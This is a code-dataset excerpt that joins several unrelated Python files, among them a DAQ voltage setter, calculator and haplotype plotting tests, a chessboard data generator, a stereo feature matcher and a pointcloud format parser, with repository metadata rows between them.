def set_voltage(self, value, timeout=None):
"""
Set voltage on the output channel.
Parameters
----------
value : float
Voltage value [V]
timeout : float or None, optional
Voltage time-out [s]. If None (default), voltage is assigned indefinitely.
Raises
------
        InstrumentException : if voltage `value` is outside of ±10 V.
"""
value = float(value)
if abs(value) > 10:
raise InstrumentException(
f"Voltage {value} is outside of permissible bounds of +=10V"
)
if timeout is not None:
if timeout <= 0:
raise InstrumentException(
f"A time-out value of {timeout} seconds is not valid."
)
with nidaqmx.Task() as task:
task.ao_channels.add_ao_voltage_chan("Dev1/ao1")
task.write(value)
task.stop()
if timeout is not None:
sleep(timeout)
task.write(0)
task.stop()
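# Illustrative usage (the output channel "Dev1/ao1" is hard-coded above):
#   daq = PCI6281()
#   daq.set_voltage(2.5, timeout=1.0)  # hold 2.5 V for 1 s, then reset to 0 V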
| 26.32 | 86 | 0.522796 | 1,241 | 0.943009 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.433131 |
7b6ab2fe5bfb6e6c729ecffe273017b734826941 | 1,135 | py | Python | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | """ Unittest.
"""
import unittest
from calculator.standard.operations_model import (
UniOperation,
BiOperation,
Square,
SquareRoot,
Reciprocal,
Add,
Subtract,
Multiply,
Divide,
Modulo
)
class OperationsModelTest(unittest.TestCase):
""" Operations model test suite.
"""
def test_operation_category(self):
# steps
square = Square
multiply = Multiply
# test
self.assertTrue(issubclass(square, UniOperation))
self.assertTrue(issubclass(multiply, BiOperation))
def test_uni_operand_operations(self):
# steps
square = Square
square_root = SquareRoot
# test
self.assertEqual(square.eval(5), 25)
self.assertEqual(square_root.eval(25), 5)
def test_bi_operand_operations(self):
# steps
add = Add
sub = Subtract
mul = Multiply
div = Divide
# test
self.assertEqual(add.eval(1, 2), 3)
self.assertEqual(sub.eval(5, -2), 7)
self.assertEqual(mul.eval(1.5, -5), -7.5)
self.assertEqual(div.eval(6, 0.5), 12)
| 21.415094 | 58 | 0.600881 | 905 | 0.797357 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.084581 |
7b6c01aa137fe5eab922023b4f7b039eaadf78f0 | 684 | py | Python | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | from lab.distribution import DistrManager
def main():
sizes = [20, 60, 100]
rhos = [0, 0.5, 0.9]
times = 1000
manager = DistrManager(sizes, rhos, times)
for size in sizes:
for rho in rhos:
mean, sq_mean, disp = manager.get_coeff_stats("Normal", size, rho)
print(
f"Normal\t Size = {size}\t Rho = {rho}\t Mean = {mean}\t Squares mean = {sq_mean}\t Dispersion = {disp}"
)
mean, sq_mean, disp = manager.get_coeff_stats("Mixed", size, rho)
print(
f"Mixed\t Size = {size}\t Mean = {mean}\t Squares mean = {sq_mean}\t Dispersion = {disp}"
)
manager.draw(size)
| 28.5 | 120 | 0.557018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.304094 |
7b6c677fc5296afba3c3ed059b4dbdc0e009c7cf | 3,010 | py | Python | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| 2 | 2021-01-09T10:43:25.000Z | 2021-02-16T17:21:08.000Z | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| 3 | 2021-02-01T11:28:17.000Z | 2021-03-29T22:12:48.000Z | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| null | null | null | import unittest
import logging
import os
import haplotype_plot.genotyper as genotyper
import haplotype_plot.reader as reader
import haplotype_plot.haplotyper as haplotyper
import haplotype_plot.plot as hplot
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
dir_path = os.path.dirname(os.path.realpath(__file__))
class TestPlotting(unittest.TestCase):
vcf_path = os.path.join(dir_path, "data/chr01.vcf")
chrom = "chr01"
parental_sample = "SAMPLE4"
sample_list = None
phase = False
def setUp(self) -> None:
self.sample_list = reader.get_samples(self.vcf_path)
def test_plot_config(self):
plot_config = hplot.PlotConfig()
logger.debug(plot_config)
def test_generate_heterozygous_yticks(self):
heterozygous = haplotyper.Zygosity.HET
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, heterozygous)
plotter = hplot.Plotter(haplotype_wrapper)
labels = plotter.get_ytickslabels()
logger.debug("Parent: {parent}".format(parent=self.parental_sample))
logger.debug(labels)
def test_generate_homozygous_yticks(self):
homozygous = haplotyper.Zygosity.HOM
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, homozygous)
plotter = hplot.Plotter(haplotype_wrapper)
labels = plotter.get_ytickslabels()
logger.debug("Parent: {parent}".format(parent=self.parental_sample))
logger.debug(labels)
def test_plot_homozygous_haplotypes(self):
homozygous = haplotyper.Zygosity.HOM
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, homozygous)
plotter = hplot.Plotter(haplotype_wrapper)
ytickslabels = plotter.get_ytickslabels()
custom_config = hplot.PlotConfig(
title="Parental '{parent}' in '{chrom}'".format(parent=self.parental_sample, chrom=self.chrom),
xtickslabels=plotter.get_xtickslabels(),
ytickslabels=ytickslabels,
start=0,
end=1000,
size_x=10,
size_y=len(ytickslabels) * .2,
show=True
)
plotter.plot_haplotypes(custom_config)
def test_plot_heterozygous_haplotypes(self):
heterozygous = haplotyper.Zygosity.HET
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, heterozygous)
plotter = hplot.Plotter(haplotype_wrapper)
user_conf = list(["show=False", "xtickslabels=False", "size_y=5"])
plotter.plot_haplotypes(override_conf=user_conf)
if __name__ == '__main__':
unittest.main()
| 38.589744 | 108 | 0.644186 | 2,606 | 0.865781 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.051163 |
7b6e114171988bb11bb357d60e9671587a0a54e0 | 1,806 | py | Python | src/docknet/data_generator/chessboard_data_generator.py | Accenture/Docknet | e81eb0c5aefd080ebeebf369d41f8d3fa85ab917 | [
"Apache-2.0"
]
| 2 | 2020-06-29T08:58:26.000Z | 2022-03-08T11:38:18.000Z | src/docknet/data_generator/chessboard_data_generator.py | jeekim/Docknet | eb3cad13701471a7aaeea1d573bc5608855bab52 | [
"Apache-2.0"
]
| 1 | 2022-03-07T17:58:59.000Z | 2022-03-07T17:58:59.000Z | src/docknet/data_generator/chessboard_data_generator.py | jeekim/Docknet | eb3cad13701471a7aaeea1d573bc5608855bab52 | [
"Apache-2.0"
]
| 3 | 2020-06-29T08:58:31.000Z | 2020-11-22T11:23:11.000Z | from typing import Tuple
import numpy as np
from docknet.data_generator.data_generator import DataGenerator
class ChessboardDataGenerator(DataGenerator):
"""
The chessboard data generator generates two classes (0 and 1) of 2D vectors distributed as follows:
0011
0011
1100
1100
"""
def func0(self, x: np.array):
"""
Generator function of 2D vectors of class 0 (top-left and bottom-right squares)
:param x: a 2D random generated vector
:return: the corresponding individual of class 0
"""
f0 = x[0] * self.x_half_scale + self.x_min
f1 = x[1] * self.y_scale + self.y_min
if x[1] < 0.5:
f0 += self.x_half_scale
return np.array([f0, f1])
def func1(self, x: np.array):
"""
Generator function of 2D vectors of class 1 (top-right and bottom-left squares)
:param x: a 2D random generated vector
:return: the corresponding individual of class 1
"""
f0 = x[0] * self.x_scale + self.x_min
f1 = x[1] * self.y_half_scale + self.y_min
if x[0] >= 0.5:
f1 += self.y_half_scale
return np.array([f0, f1])
def __init__(self, x0_range: Tuple[float, float], x1_range: Tuple[float, float]):
"""
Initializes the chessboard data generator
:param x0_range: tuple of minimum and maximum x values
:param x1_range: tuple of minimum and maximum y values
"""
super().__init__((self.func0, self.func1))
self.x_scale = x0_range[1] - x0_range[0]
self.x_min = x0_range[0]
self.x_half_scale = self.x_scale / 2
self.y_scale = x1_range[1] - x1_range[0]
self.y_min = x1_range[0]
self.y_half_scale = self.y_scale / 2
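# Example usage, a sketch only: the sampling interface lives on the parent
# DataGenerator class, which is not shown in this file, so `generate` below is
# a hypothetical method name.
#
#   gen = ChessboardDataGenerator(x0_range=(0.0, 4.0), x1_range=(0.0, 4.0))
#   samples, labels = gen.generate(100)  # hypothetical call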
| 32.836364 | 103 | 0.606312 | 1,693 | 0.937431 | 0 | 0 | 0 | 0 | 0 | 0 | 773 | 0.428018 |
7b7181c5da71f675df29626211d629f1f9f4e5ef | 5,485 | py | Python | stereoVO/geometry/features.py | sakshamjindal/Visual-Odometry-Pipeline-in-Python | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| 10 | 2021-11-01T23:56:30.000Z | 2022-03-07T08:08:25.000Z | stereoVO/geometry/features.py | sakshamjindal/StereoVO-SFM | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| null | null | null | stereoVO/geometry/features.py | sakshamjindal/StereoVO-SFM | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| 1 | 2021-12-02T03:15:00.000Z | 2021-12-02T03:15:00.000Z | import cv2
import numpy as np
import matplotlib.pyplot as plt
__all__ = ['DetectionEngine']
class DetectionEngine():
"""
    Main engine code for the detection of features in the frames and the
    matching of features across the frames at the current stereo state
"""
def __init__(self, left_frame, right_frame, params):
"""
        :param left_frame (np.array): of size (HxWx3 or HxW) of stereo configuration
        :param right_frame (np.array): of size (HxWx3 or HxW) of stereo configuration
        :param params (AttriDict): contains parameters for the stereo configuration,
                                   and for the detection and matching of computer vision features
"""
self.left_frame = left_frame
self.right_frame = right_frame
self.params = params
def get_matching_keypoints(self):
"""
Runs a feature detector on both the features, computes keypoints and descriptor
information and performs flann based matching to match keypoints across the left
and right frames and applying ratio test to filter "good" matching features
Returns:
matchedPoints (tuple of np.array for (left, right)): each of size (N,2) of matched features
            keypoints (tuple of lists for (left, right)) : each list containing metadata of keypoints from the feature detector
            descriptors (tuple of np.array for (left, right)) : each of size (Mxd), containing feature vectors of the keypoints from the feature detector
"""
if self.params.geometry.detection.method == "SIFT":
detector = cv2.xfeatures2d.SIFT_create()
else:
raise NotImplementedError("Feature Detector has not been implemented. Please refer to the Contributing guide and raise a PR")
        # cv2.cvtColor requires a conversion code; convert 3-channel frames to
        # grayscale before feature detection (OpenCV loads images as BGR)
        if len(self.left_frame.shape) == 3:
            self.left_frame = cv2.cvtColor(self.left_frame, cv2.COLOR_BGR2GRAY)
        if len(self.right_frame.shape) == 3:
            self.right_frame = cv2.cvtColor(self.right_frame, cv2.COLOR_BGR2GRAY)
keyPointsLeft, descriptorsLeft = detector.detectAndCompute(self.left_frame, None)
keyPointsRight, descriptorsRight = detector.detectAndCompute(self.right_frame, None)
if self.params.debug.plotting.features:
DetectionEngine.plot_feature(self.left_frame, self.right_frame, keyPointsLeft, keyPointsRight)
args_feature_matcher = self.params.geometry.featureMatcher.configs
indexParams = args_feature_matcher.indexParams
searchParams = args_feature_matcher.searchParams
if self.params.geometry.featureMatcher.method == "FlannMatcher":
matcher = cv2.FlannBasedMatcher(indexParams, searchParams)
else:
raise NotImplementedError("Feature Matcher has not been implemented. Please refer to the Contributing guide and raise a PR")
matches = matcher.knnMatch(descriptorsLeft, descriptorsRight, args_feature_matcher.K)
        # Apply Lowe's ratio test to keep only distinctive matches
goodMatches = []
ptsLeft = []
ptsRight = []
for m, n in matches:
if m.distance < args_feature_matcher.maxRatio * n.distance:
goodMatches.append([m])
ptsLeft.append(keyPointsLeft[m.queryIdx].pt)
ptsRight.append(keyPointsRight[m.trainIdx].pt)
ptsLeft = np.array(ptsLeft).astype('float64')
ptsRight = np.array(ptsRight).astype('float64')
if self.params.debug.plotting.featureMatches:
DetectionEngine.plot_feature_matches(self.left_frame, self.right_frame, keyPointsLeft, keyPointsRight, goodMatches)
matchedPoints = ptsLeft, ptsRight
keypoints = keyPointsLeft, keyPointsRight
descriptors = descriptorsLeft, descriptorsRight
return matchedPoints, keypoints, descriptors
@staticmethod
def plot_feature(left_frame, right_frame, keyPointsLeft, keyPointsRight):
"""
        Helper function for plotting features on the respective left and right frames
        using keypoints computed from the feature detector
"""
kp_on_left_frame = cv2.drawKeypoints(left_frame,
keyPointsLeft,
None)
kp_on_right_frame = cv2.drawKeypoints(right_frame,
keyPointsRight,
None)
plt.figure(figsize=(30, 15))
plt.subplot(1, 2, 1)
plt.imshow(kp_on_left_frame)
plt.subplot(1, 2, 2)
plt.imshow(kp_on_right_frame)
plt.show()
@staticmethod
def plot_feature_matches(left_frame, right_frame, keyPointsLeft, keyPointsRight, matches):
"""
Helper function for plotting feature matches across the left and right frames
using keypoint calculated from the feature detector and matches from the featue matcher
"""
feature_matches = cv2.drawMatchesKnn(left_frame,
keyPointsLeft,
right_frame,
keyPointsRight,
matches,
outImg=None,
flags=0)
plt.figure(figsize=(20, 10))
plt.imshow(feature_matches)
plt.show()
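# Example usage, a sketch: `params` is assumed to be an AttrDict-like config
# object exposing the attributes read above (geometry.detection.method,
# geometry.featureMatcher.*, debug.plotting.*); its construction is not shown
# in this file.
#
#   left = cv2.imread('left.png', cv2.IMREAD_GRAYSCALE)
#   right = cv2.imread('right.png', cv2.IMREAD_GRAYSCALE)
#   engine = DetectionEngine(left, right, params)
#   (ptsLeft, ptsRight), keypoints, descriptors = engine.get_matching_keypoints()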
| 40.036496 | 149 | 0.615497 | 5,389 | 0.982498 | 0 | 0 | 1,615 | 0.294439 | 0 | 0 | 1,828 | 0.333273 |
7b72e8377f711b1cb1ee17fd39204a3883465200 | 78 | py | Python | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| 1 | 2021-02-28T11:36:50.000Z | 2021-02-28T11:36:50.000Z | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| null | null | null | shopify_csv/__init__.py | d-e-h-i-o/shopify_csv | 0c49666bca38802a756502f72f835abb63115025 | [
"MIT"
]
| null | null | null | from .constants import FIELDS, PROPERTIES
from .shopify_csv import ShopifyRow
| 26 | 41 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b745432625aa3fd9106d5e8fec7445b66115435 | 8,070 | py | Python | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| 1 | 2016-09-04T20:44:15.000Z | 2016-09-04T20:44:15.000Z | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| 6 | 2015-02-19T10:27:39.000Z | 2015-02-19T10:58:49.000Z | pgpointcloud_utils/pcformat.py | dustymugs/pgpointcloud_utils | 24193438982a8070a0aada34fca4db62688d18ba | [
"BSD-3-Clause"
]
| null | null | null | from decimal import Decimal
import xml.etree.ElementTree as ET
from .pcexception import *
class PcDimension(object):
DEFAULT_SCALE = 1.
BYTE_1 = 1
BYTE_2 = 2
BYTE_4 = 4
BYTE_8 = 8
BYTES = [BYTE_1, BYTE_2, BYTE_4, BYTE_8]
INTERPRETATION_MAPPING = {
'unknown': {},
'int8_t': {
'size': BYTE_1,
'struct': 'b'
},
'uint8_t': {
'size': BYTE_1,
'struct': 'B'
},
'int16_t': {
'size': BYTE_2,
'struct': 'h'
},
'uint16_t': {
'size': BYTE_2,
'struct': 'H'
},
'int32_t': {
'size': BYTE_4,
'struct': 'i'
},
'uint32_t': {
'size': BYTE_4,
'struct': 'I'
},
'int64_t': {
'size': BYTE_8,
'struct': 'q'
},
'uint64_t': {
'size': BYTE_8,
'struct': 'Q'
},
'float': {
'size': BYTE_4,
'struct': 'f'
},
'double': {
'size': BYTE_8,
'struct': 'd'
},
}
INTERPRETATION = INTERPRETATION_MAPPING.keys()
def __init__(
self,
name=None, size=None, interpretation=None, scale=None
):
self._name = None
self._size = None
self._interpretation = None
self._scale = PcDimension.DEFAULT_SCALE
if name is not None:
self.name = name
if size is not None:
self.size = size
if interpretation is not None:
self.interpretation = interpretation
if scale is not None:
self.scale = scale
@property
def name(self):
return self._name
@name.setter
def name(self, new_value):
try:
new_value = str(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as a string'
)
self._name = new_value
@property
def size(self):
return self._size
@size.setter
def size(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
if new_value not in PcDimension.BYTES:
raise PcInvalidArgException(
message='Invalid size provided'
)
self._size = new_value
@property
def interpretation(self):
return self._interpretation
@interpretation.setter
def interpretation(self, new_value):
if new_value not in PcDimension.INTERPRETATION:
raise PcInvalidArgException(
message='Invalid interpretation provided'
)
self._interpretation = new_value
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, new_value):
try:
new_value = float(new_value)
except:
raise PcInvalidArgException(
                message='Value cannot be treated as a float'
)
# scale cannot be zero
if Decimal(new_value) == Decimal(0.):
raise PcInvalidArgException(
message='Value cannot be zero'
)
self._scale = new_value
@property
def struct_format(self):
if self.interpretation is None:
return None
return PcDimension.INTERPRETATION_MAPPING[self.interpretation].get(
'struct', None
)
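# Example usage, a sketch illustrating the validation above:
#
#   dim = PcDimension(name='Z', size=4, interpretation='int32_t', scale=0.01)
#   dim.struct_format  # -> 'i'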
class PcFormat(object):
def __init__(self, pcid=None, srid=None, proj4text=None, dimensions=None):
self._pcid = None
self._srid = None
self._proj4text = None
self._dimensions = []
        # keep the attribute name consistent with _build_dimension_lookups()
        self._dimension_lookups = {'name': {}}
if pcid:
self.pcid = pcid
if srid:
self.srid = srid
if dimensions:
self.dimensions = dimensions
@property
def pcid(self):
return self._pcid
@pcid.setter
def pcid(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
self._pcid = new_value
@property
def srid(self):
return self._srid
@srid.setter
def srid(self, new_value):
try:
new_value = int(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as an integer'
)
self._srid = new_value
@property
def proj4text(self):
return self._proj4text
@proj4text.setter
def proj4text(self, new_value):
try:
new_value = str(new_value)
except:
raise PcInvalidArgException(
message='Value cannot be treated as a string'
)
self._proj4text = new_value
@property
def dimensions(self):
return self._dimensions
@dimensions.setter
def dimensions(self, new_value):
if not isinstance(new_value, list):
raise PcInvalidArgException(
message='Value not a list'
)
for dim in new_value:
if not isinstance(dim, PcDimension):
raise PcInvalidArgException(
message='Element of list not instance of PcDimension'
)
self._dimensions = new_value
# build lookups
self._build_dimension_lookups()
def _build_dimension_lookups(self):
self._dimension_lookups = {
'name': {}
}
for dim in self._dimensions:
self._dimension_lookups['name'][dim.name] = dim
@classmethod
def import_format(cls, pcid, srid, schema):
'''
        helper function to import a record from the pointcloud_formats table
'''
frmt = cls(pcid=pcid, srid=srid)
namespaces = {
'pc': 'http://pointcloud.org/schemas/PC/1.1'
}
root = ET.fromstring(schema)
# first pass, build dict of dimensions
dimensions = {}
for dim in root.findall('pc:dimension', namespaces):
index = int(dim.find('pc:position', namespaces).text) - 1
size = dim.find('pc:size', namespaces).text
name = dim.find('pc:name', namespaces).text
interpretation = dim.find('pc:interpretation', namespaces).text
scale = dim.find('pc:scale', namespaces)
if scale is not None:
scale = scale.text
dimensions[index] = PcDimension(
name=name,
size=size,
interpretation=interpretation,
scale=scale
)
# second pass, convert dict to list for guaranteed order
_dimensions = [None] * len(dimensions)
        for index, dimension in dimensions.items():
_dimensions[index] = dimension
frmt.dimensions = _dimensions
return frmt
@property
def struct_format(self):
frmt = []
num_dimensions = len(self.dimensions)
        for index in range(num_dimensions):
frmt.append(
self.dimensions[index].struct_format
)
frmt = ' '.join(frmt)
return frmt
def get_dimension(self, name_or_pos):
'''
return the dimension by name or position (1-based)
'''
if isinstance(name_or_pos, int):
# position is 1-based
return self.dimensions[name_or_pos - 1]
else:
return self._dimension_lookups['name'][name_or_pos]
def get_dimension_index(self, name):
'''
return the index of the dimension by name
'''
if name not in self._dimension_lookups['name']:
return None
return self.dimensions.index(self._dimension_lookups['name'][name])
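# Example usage, a sketch: the XML below is a minimal hand-written schema in the
# pointcloud.org PC/1.1 namespace, not copied from a real pointcloud_formats row.
#
#   schema = '''<?xml version="1.0" encoding="UTF-8"?>
#   <pc:PointCloudSchema xmlns:pc="http://pointcloud.org/schemas/PC/1.1">
#     <pc:dimension>
#       <pc:position>1</pc:position>
#       <pc:name>X</pc:name>
#       <pc:size>4</pc:size>
#       <pc:interpretation>int32_t</pc:interpretation>
#       <pc:scale>0.01</pc:scale>
#     </pc:dimension>
#   </pc:PointCloudSchema>'''
#   frmt = PcFormat.import_format(pcid=1, srid=4326, schema=schema)
#   frmt.get_dimension('X').struct_format  # -> 'i'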
| 24.603659 | 78 | 0.53482 | 7,975 | 0.988228 | 0 | 0 | 5,002 | 0.619827 | 0 | 0 | 1,173 | 0.145353 |